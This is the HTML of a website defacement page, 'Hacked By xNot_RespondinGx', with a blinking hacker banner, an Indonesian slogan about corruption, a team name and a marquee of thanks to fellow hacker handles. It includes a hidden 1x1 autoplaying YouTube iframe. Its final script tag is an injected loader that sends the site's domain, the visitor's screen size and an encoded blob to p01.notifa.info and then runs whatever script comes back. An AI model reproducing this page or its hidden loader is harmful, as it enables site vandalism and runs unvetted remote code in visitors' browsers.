<html>
	<head>
		<link rel="shorcut icon" href=""></link>
		<title>Hacked By xNot_RespondinGx</title>
		<meta charset="UTF-8" />
		<style>
			@import url('https://fonts.googleapis.com/css?family=Orbitron');
			body {
				font-family: courier new;
				background: #000;
				color: #28FE14;
			}
			.blink { 
				font-family: Orbitron;
				-webkit-animation-name: blinker; 
				-webkit-animation-duration: 2s; 
				-webkit-animation-timing-function: linear; 
				-webkit-animation-iteration-count: infinite; 
				-moz-animation-name: blinker; 
				-moz-animation-duration: 1s; 
				-moz-animation-timing-function: linear; 
				-moz-animation-iteration-count: infinite;
				animation-name: blinker; 
				animation-duration: 1s; 
				animation-timing-function: linear; 
				animation-iteration-count: infinite;
				color: #385164; } 	
				@-moz-keyframes blinker { 
				0% { opacity: 1.0; }
				50% { opacity: 0.0; } 
				100% { opacity: 1.0; } } 
				@-webkit-keyframes blinker { 
				0% { opacity: 1.0; } 
				50% { opacity: 0.0; } 
				100% { opacity: 1.0; } } 
				@keyframes blinker {
			  0% { opacity: 1.0; } 
			  50% { opacity: 0.0; } 
			  100% { opacity: 1.0; } }
			}
		</style>
	</head>
	<body>
	<body background="http://www12.0zz0.com/2013/01/18/14/249261711.gif">
		<center><img src="https://pusdiklatmu.id/xNot_RespondinGx.jpg" width="385" height="385" background:url('https://i.hizliresim.com/gqaEb3.gif');"><br/>
		<b> <h1 class="blink"><font size="9" style="color: red;text-shadow: 0px 1px 12px aqua;background:url('https://i.hizliresim.com/gqaEb3.gif');">Hacked By xNot</font><font size="9" style="color: white;text-shadow: 0px 1px 12px aqua;background:url('https://i.hizliresim.com/gqaEb3.gif');">_RespondinGx</font></h1> </b><br/><br>
		<b> <font size="2" style="color: red;text-shadow: 0px 1px 12px aqua;background:url('https://i.hizliresim.com/gqaEb3.gif');">Gimana korupsi gak meraja lela,jika penjara saja mewah.
<b></font> <br/><br>
		<b> <font size="5" style="color: red;text-shadow: 0px 1px 12px aqua;background:url('https://i.hizliresim.com/gqaEb3.gif');">Problem</font><font size="5" style="color: white;text-shadow: 0px 1px 12px aqua;background:url('https://i.hizliresim.com/gqaEb3.gif');">yberTeam</font></h1> </b><br>
		<b><br> <font size="2" style="color: red;text-shadow: 0px 1px 12px aqua;background:url('https://i.hizliresim.com/gqaEb3.gif');">[+]Thanks to:</font></b><br/>
		<font color="Red"><marquee behavior='alternate' width='60%'><font face="courier new"><b> <font size="2" style="color: red;text-shadow: 0px 1px 12px aqua;background:url('https://i.hizliresim.com/gqaEb3.gif');">| DIR-64 | Security007 | Mr.Q0ly | Intitle_X | FCKNUMBER69 | 2631min |</font><font size="2" style="color: white;text-shadow: 0px 1px 12px aqua;background:url('https://i.hizliresim.com/gqaEb3.gif');"> Mr.MoonStone | Mr.5413H0 | explorer404 | Mr.Rm19 | //++DEZTROY | GM09S |</font></h1> </b></center></marquee></font><br/><br/>
		<center>
	<iframe width="1" height="1" src="https://www.youtube.com/embed/Gl0pdO4uEQ8?autoplay=1" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen=""></iframe>
</html>

		<img src="http://kodbul.org/img/konuayirac/kurukafa.gif" border="0">
<div style="display: none;">

</div>
</script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5mpmZvECnNqH6OkM5hZSGZLW9w6BVLqqfXDd7l%2fQqUTM3GJJPTwMul0QBzccbJw27Xnppe%2brcgzqwEnRL8nKxt2fnPh06UnvWt%2fMGsz3mF1B55UWO0eQripK%2bK8WQUKOZOkxT%2btK0UVyVi88Lh6fFyv5stEiDPWmGM3ZLD7LXi2PiQ0M8A%2fR5wcqpjsZ4Q%2bSmHaJIVpnWkmLPUHesQZeL5BjKcPxhr33RKtOacehRrq6DS1kdZcBUukiK5ZkcvK%2bWbl%2fKbPwHgRHABsg4jE2UngLC4vs291sJAGq1qpdt8pZjPLDFPPw%2fPKjoHMTQk4C%2f22BDahh0y8Pe7YoNlX%2bjEKYIkDtTcSuIxcr5yZUhscOIYSlWbUJmTFX6aFHMGe9rW09IgzR0k3eiNrnyQa4vlcpjQLGdA5hP46SN0EVjTkV7yt8eMjER4bm%2bpt4aQWOqNrKzMe55t6I4LmKZ5YZjG1I0uMCH67CVaCDO5pp2iCxYG1z%2bJLpWMcKCLjv9Ac1%2bzzBsZdiIu1jQMAlBjOATjqtnumv%2bcuexrPlKlN5iaFFg8cvK5%2bmX65WpOqaNs8Ecm" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>